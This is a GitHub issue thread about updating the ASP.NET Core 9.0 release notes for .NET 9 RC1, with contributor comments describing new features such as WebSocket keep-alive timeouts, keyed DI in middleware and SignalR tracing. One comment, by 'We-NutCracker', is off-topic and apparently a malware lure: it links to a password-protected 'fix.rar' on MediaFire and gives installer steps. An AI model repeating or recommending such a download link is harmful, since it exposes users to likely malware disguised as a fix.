### ISSUE TITLE
Update the "What's new in ASP.NET Core 9.0" for .NET 9 Release Candidate 1

### ISSUE THREAD

**Issue by danroth27** [dotnet/AspNetCore.Docs#33442]
### Description

Update the "What's new in ASP.NET Core 9.0" for .NET 9 Release Candidate 1

### Page URL

https://learn.microsoft.com/en-us/aspnet/core/release-notes/aspnetcore-9.0?view=aspnetcore-8.0

### Content source URL

https://github.com/dotnet/AspNetCore.Docs/blob/main/aspnetcore/release-notes/aspnetcore-9.0.md

### Document ID

4e75ad25-2c3f-b28e-6a91-ac79a9c683b6

### Article author

@Rick-Anderson

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by BrennanConroy** [comment]
### Keep-Alive Timeout for WebSockets

The [WebSockets middleware](https://learn.microsoft.com/aspnet/core/fundamentals/websockets#configure-the-middleware) can now be configured for keep alive timeouts.

The keep alive timeout will abort the WebSocket and throw from `WebSocket.ReceiveAsync` if a ping frame from the websocket protocol is sent by the server and the client doesn't reply with a pong frame within the specified timeout. The ping frame is automatically sent by the server and configured with `KeepAliveInterval`. This option is useful when wanting to detect connections that might be slow or ungracefully disconnected.

The keep alive timeout can be configured globally for the WebSocket middleware:
```csharp
app.UseWebSockets(new WebSocketOptions { KeepAliveInterval = TimeSpan.FromSeconds(15) });
```

Or configured per accepted WebSocket:
```csharp
app.Run(async (context) =>
{
    using var webSocket = await context.WebSockets.AcceptWebSocketAsync(
        new WebSocketAcceptContext { KeepAliveTimeout = TimeSpan.FromSeconds(15) });

    // ...
}
```

**Comment by BrennanConroy** [comment]
### Keyed DI in Middleware

Middleware now supports [Keyed DI](https://learn.microsoft.com/aspnet/core/fundamentals/dependency-injection?view=aspnetcore-8.0#keyed-services) in both the constructor and the `Invoke`/`InvokeAsync` method.

```csharp
private class MyMiddleware
{
    private readonly RequestDelegate _next;

    public MyMiddleware(RequestDelegate next, [FromKeyedServices("name")] IService service)
    {
        _next = next;
    }

    public Task Invoke(HttpContext context, [FromKeyedServices("obj")] IRequestService requestService) => _next(context);
}
```

See [Write custom ASP.NET Core middleware](https://learn.microsoft.com/aspnet/core/fundamentals/middleware/write?view=aspnetcore-8.0) for more information on writing custom middleware.

Thanks to [NicoBrabers](https://github.com/NicoBrabers) for this contribution!

**Comment by MackinnonBuck** [comment]
### `<InputNumber>` range input support

The `<InputNumber>` component now supports specifying the `type="range"` attribute, bringing model binding and form validation to range inputs:

```razor
<InputNumber type="range" min="1" max="10" step="1" @bind-Value="Model.Rating" />
```

Thanks for the contribution, [MattyLeslie](https://github.com/MattyLeslie)!

<details>

<summary>In case we want a more detailed example:</summary>

```razor
<EditForm FormName="BlazorSurvey" Model="Model">
    <DataAnnotationsValidator />
    <ValidationSummary />

    <div>
        <label for="rating">Rate how awesome this feature is (1 to 10)</label><br />
        <InputNumber id="rating" type="range" min="1" max="10" step="1" @bind-Value="Model!.Rating" />
    </div>

    <button type="submit">Submit</button>
</EditForm>

@code {
    [SupplyParameterFromForm] BlazorSurvey? Model { get; set; }

    override protected void OnInitialized() => Model ??= new();

    class BlazorSurvey
    {
        [Required, Range(minimum: 10, maximum: 10, ErrorMessage = "The rating must be 10.")]
        public int Rating { get; set; }
    }
}
```
</details>

**Comment by danroth27** [comment]
From @JamesNK:

## Improvements to SignalR distributed tracing

.NET 9 preview 6 added [initial support for SignalR distributed tracing](https://github.com/dotnet/core/blob/main/release-notes/9.0/preview/preview6/aspnetcore.md#improved-distributed-tracing-for-signalr). RC1 improves SignalR tracing with new capabilities:

* .NET SignalR client has an `ActivitySource` named "Microsoft.AspNetCore.SignalR.Client". Hub invocations now create a client span. Note that other SignalR clients, such as the JavaScript client, don't support tracing. This feature will be added to more clients in future releases.
* Hub invocations on the client and server support [context propagation](https://opentelemetry.io/docs/concepts/context-propagation/). Propagating the trace context enables true distributed tracing. It's now possible to see invocations flow from the client to the server and back.

Here's how these new activities look in the [.NET Aspire dashboard](https://learn.microsoft.com/dotnet/aspire/fundamentals/dashboard/overview?tabs=bash#standalone-mode):

![signalr-distributed-tracing](https://github.com/user-attachments/assets/baae2e32-a0da-4d5a-b9a4-dd77edbba476)

**Comment by wadepickett** [comment]
We have live changes and reviews going on async in both dotnet/release-notes-draft and here in this docs version.

I do not suggest we have to figure it out now for this release, but it seems like at some point we could do this all one place with one source for the same audience.  We are duplicating effort with async reviews and edits are going on in both places.  A process that in inherently invites some problems that could be avoided.

**Comment by amcasey** [comment]
# `dotnet dev-certs https --trust` on Linux

On Ubuntu and Fedora, `dotnet dev-certs https --trust` will now configure trust of the self-signed development certificate in Chromium (Edge, Chrome, Chromium, etc) and Mozilla (Firefox, etc) browsers, as well as in dotnet (`HttpClient`, etc).  Previously, `--trust` only worked on Windows and macOS.

[I believe the [docs changes](https://github.com/dotnet/AspNetCore.Docs/pull/33221/files) are staged but not live.]

**Comment by wadepickett** [comment]
> ## Improvements to SignalR distributed tracing ...

I will combine this new SignalR Client ActivitySource with the existing section we have for the SignalR Hub ActivitySource as two sub-sections to a SignalR ActivitySource section.  (Unless that isn't wanted.)
